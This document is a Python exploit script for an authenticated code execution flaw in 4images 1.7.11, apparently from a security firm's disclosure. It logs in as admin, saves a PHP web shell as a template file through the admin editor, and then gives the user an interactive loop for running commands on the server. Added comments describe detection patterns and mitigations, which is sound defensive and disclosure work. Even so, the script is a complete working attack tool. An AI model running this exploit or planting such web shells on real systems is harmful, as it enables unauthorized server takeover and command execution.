- #!/usr/local/bin/python
- # Exploit for 4images 1.7.11 Code Execution vulnerability
- # An admin account is required to use this exploit
- # Curesec GmbH
- import sys
- import re
- import argparse
- import requests # requires requests lib
# --- Script setup: positional arguments and the fixed paths used below ---
# The script takes the target's base URL plus a *valid admin* login; as the
# header comment says, this is a post-authentication issue, so the exposure
# is a compromised or over-privileged admin account, not anonymous access.
parser = argparse.ArgumentParser()
parser.add_argument("url", help="base url to vulnerable site")
parser.add_argument("username", help="admin username")
parser.add_argument("password", help="admin password")
args = parser.parse_args()
url = args.url
username = args.username
password = args.password
# Admin login form, and the admin template editor (admin/templates.php) that
# is abused by upload(): it saves a caller-chosen file name and content under
# the web-served templates folder.
loginPath = "/admin/index.php"
fileManagerPath = "/admin/templates.php"
# The "template" saved is a PHP file, so the web server executes it instead of
# treating it as template text. Defensive notes: the editor should only accept
# template names/extensions it actually renders, and PHP execution should be
# disabled for the templates directory; a save request carrying a .php
# template_file_name is the server-side detection signal.
shellFileName = "404.php"
shellContent = "<?php passthru($_GET['x']); ?>"
def login(requestSession, url, username, password):
    """Authenticate *requestSession* against the 4images admin login form.

    Fetches the login page to read its ``__csrf`` token, then POSTs the
    credentials together with that token on the same session (so the
    session cookie is retained for later requests).

    Returns True when the response body no longer contains the string
    ``loginpassword``, i.e. the login form was not re-rendered. This is a
    heuristic success check, not a parsed status.
    """
    csrfRequest = requestSession.get(url)
    # Greedy ``(.*)`` assumes a single ``__csrf`` input on the page;
    # re.search returns None when the marker is absent and the following
    # ``.group(1)`` then raises AttributeError rather than a clear error.
    csrfTokenRegEx = re.search('name="__csrf" value="(.*)" />', csrfRequest.text)
    csrfToken = csrfTokenRegEx.group(1)
    postData = {"action": "login", "redirect": ".%2F..%2Fadmin%2Findex.php", "__csrf": csrfToken, "loginusername": username, "loginpassword": password}
    loginResult = requestSession.post(url, data = postData).text
    return "loginpassword" not in loginResult
def upload(requestSession, url, fileName, fileContent):
    """Save *fileContent* as template *fileName* through the admin template editor.

    Same CSRF-token step as ``login``, then a POST with ``action=savetemplate``
    for ``template_folder=default``. Nothing is returned and the response is
    only read into an unused local (``loginResult``), so a failed save goes
    unnoticed by the caller.

    From the server's side this single request — a ``savetemplate`` action
    whose ``template_file_name`` ends in ``.php`` — is the event an audit log
    or request-filtering rule would need to flag.
    """
    csrfRequest = requestSession.get(url)
    # Same regex/None caveat as in login(): no match -> AttributeError.
    csrfTokenRegEx = re.search('name="__csrf" value="(.*)" />', csrfRequest.text)
    csrfToken = csrfTokenRegEx.group(1)
    postData = {"action": "savetemplate", "content": fileContent, "template_file_name": fileName, "__csrf": csrfToken, "template_folder": "default"}
    loginResult = requestSession.post(url, data = postData).text
def runShell(url):
    """Interactive loop: each typed line is appended to *url* and fetched.

    *url* already ends in ``?x=``; the typed text is concatenated without
    URL-encoding. Input comes from ``raw_input`` (Python 2 only). The loop
    stops as soon as the entered text contains the substring ``exit``.

    Requests here use a bare ``requests.get`` rather than the logged-in
    ``requestSession``, so the script presumably expects the written file to
    be reachable without authentication. The corresponding access-log pattern
    is repeated GETs to the templates path with an ``x`` query parameter.
    """
    print("enter command, or enter exit to quit.")
    command = raw_input("$ ")
    while "exit" not in command:
        print(requests.get(url + command).text)
        command = raw_input("$ ")
# --- Main flow: admin login -> save PHP "template" -> interactive loop ---
requestSession = requests.session()
if login(requestSession, url + loginPath, username, password):
    print("successful: login")
else:
    exit("ERROR: Incorrect username or password")
# upload() returns nothing, so its outcome is never checked before
# continuing; a failed save simply produces HTTP errors in runShell().
upload(requestSession, url + fileManagerPath, shellFileName, shellContent)
# The saved file is requested from the public templates path, not the admin
# area: once the admin-only editor has written it, the file is an entry point
# that no longer depends on the admin session. Blocking PHP execution under
# /templates/ and constraining accepted template names both close this.
runShell(url + "/templates/default/" + shellFileName + "?x=")